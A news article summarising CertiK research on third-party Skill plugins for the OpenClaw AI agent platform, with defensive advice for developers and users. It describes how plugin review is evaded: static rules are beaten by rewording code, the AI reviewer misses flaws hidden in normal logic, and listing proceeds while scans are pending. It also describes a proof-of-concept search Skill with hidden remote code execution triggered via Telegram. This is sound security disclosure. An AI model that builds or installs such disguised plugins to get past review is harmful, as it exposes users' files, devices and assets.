Recently, the open-source self-hosted AI intelligence platform OpenClaw (commonly referred to as "Little Lobster" in the industry) has rapidly gained popularity due to its flexible scalability and autonomous deployment features, becoming a phenomenal product in the personal AI intelligence space. Its ecological core, Clawhub, serves as an application marketplace, gathering a massive number of third-party Skill plugins that allow the intelligence agent to unlock advanced capabilities with one click, ranging from web search and content creation to encrypted wallet operations, on-chain interactions, and system automation. The scale of the ecosystem and the number of users have seen explosive growth.
But what is the true security boundary for these kinds of third-party Skills running in high-permission environments?
Recently, CertiK, the world's largest Web3 security company, released the latest research on Skill security. The document points out that there is a cognitive dissonance in the market regarding the security boundaries of the AI intelligence ecosystem: the industry widely regards "Skill scanning" as the core security boundary, while this mechanism is nearly ineffective against hacker attacks.
If we liken OpenClaw to the operating system of a smart device, Skills are the various apps installed on the system. Unlike ordinary consumer-grade apps, some Skills in OpenClaw run in high-permission environments, allowing direct access to local files, invoking system tools, connecting to external services, executing host environment commands, and even operating users' encrypted digital assets. If security issues arise, it can directly lead to sensitive information leakage, remote takeover of devices, theft of digital assets, and other serious consequences.
Currently, the industry's general security solution for third-party Skills is "pre-listing scanning and review." OpenClaw's Clawhub has also established a three-layer review protection system: integrating VirusTotal code scanning, static code detection engines, and AI logic consistency checks, pushing security pop-up notifications to users based on risk grading in an attempt to maintain ecological security. However, CertiK's research and concept validation attack testing confirm that this detection system has shortcomings in real offensive and defensive confrontations, failing to take on the core responsibility of security protection.
The research first dissects the inherent limitations of the existing detection mechanisms:
Static detection rules can be easily bypassed. This engine relies primarily on matching code features to identify risks. For example, it determines the combination of "reading environment-sensitive information + outbound network requests" as high-risk behavior, but an attacker only needs to make slight syntax modifications to the code, preserving the malicious logic entirely, to easily bypass the feature matching—like replacing dangerous content with a set of synonymous phrases, rendering the security scanner completely ineffective.
AI review has inherent detection blind spots. The core positioning of Clawhub's AI audit is a "logic consistency detector," which can only identify obvious malicious code that "declares functionality inconsistent with actual behavior," but is helpless against exploitable vulnerabilities hidden within normal business logic. It's like being unable to discover a fatal trap buried deep in the clauses of a seemingly compliant contract.
More critically, the review process has underlying design flaws: even if the VirusTotal scan results are still in "pending" status, Skills that have not completed a full "health check" can still be listed and made public directly, allowing users to install them without warning, leaving an opportunity for attackers to exploit.
To verify the true risk, the CertiK research team completed a full test. The team developed a Skill named "test-web-searcher," which superficially is a fully compliant web search tool, with code logic entirely in line with standard development norms, but actually embedded a remote code execution vulnerability within its normal functional flow.
This Skill bypassed both the static engine and AI review detection, achieving normal installation without any security warnings while the VirusTotal scan was still in pending status; ultimately, by sending a command remotely via Telegram, it successfully triggered the vulnerability, executing arbitrary commands on the host device (demonstrated by directly controlling the system to pop up the calculator).
CertiK clearly pointed out in the study that these issues are not unique product bugs of OpenClaw, but a common cognitive misstep across the entire AI intelligence industry: the industry generally views "audit scanning" as the core security defense line, while neglecting the true foundations of security, which are mandatory runtime isolation and refined permission control. This is akin to the security core of Apple's iOS ecosystem, which has never relied solely on the strict review of the App Store, but rather on the system's enforced sandboxing mechanism and refined permission controls, allowing each app to run only in its dedicated "isolation chamber," unable to arbitrarily obtain system permissions. However, the existing sandbox mechanism of OpenClaw is optional rather than mandatory, and relies heavily on user manual configuration; the vast majority of users, wanting to ensure the functionality of Skills, typically choose to disable the sandbox, ultimately leaving the intelligence agent in a "naked" state. Once a Skill with vulnerabilities or malicious code is installed, it leads to disastrous consequences.
In response to the issues discovered this time, CertiK has also provided security guidelines:
● For developers of AI intelligence agents like OpenClaw, the sandbox isolation should be set as the default mandatory configuration for third-party Skills, with a refined permission control model for Skills, and third-party code should never be allowed to inherit high permissions from the host machine by default.
● For ordinary users, Skills in the market that carry a "security" label only indicate that they have not been detected to have risks, and do not equate to absolute safety. Before the official sets the underlying enforced isolation mechanism as the default configuration, it is advisable to deploy OpenClaw on unimportant idle devices or virtual machines and to never allow it near sensitive files, password credentials, and high-value encrypted assets.
The current AI intelligence sector is on the eve of an explosion, and the speed of ecological expansion must not outpace the pace of security construction. Audit scanning can only stop elementary malicious attacks but will never serve as a security boundary for high-permission intelligence agents. Only by shifting from "pursuing perfect detection" to "default risk presence damage containment" and by establishing isolation boundaries at the runtime underlying level can we genuinely safeguard the security bottom line of AI intelligence agents and ensure that this technological revolution can proceed steadily and far.
Original research text: https://x.com/hhj4ck/status/2033527312042315816?s=20
https://mp.weixin.qq.com/s/Wxrzt7bAo86h3bOKkx6 UoA
免责声明:本文章仅代表作者个人观点,不代表本平台的立场和观点。本文章仅供信息分享,不构成对任何人的任何投资建议。用户与作者之间的任何争议,与本平台无关。如网页中刊载的文章或图片涉及侵权,请提供相关的权利证明和身份证明发送邮件到support@aicoin.com,本平台相关工作人员将会进行核查。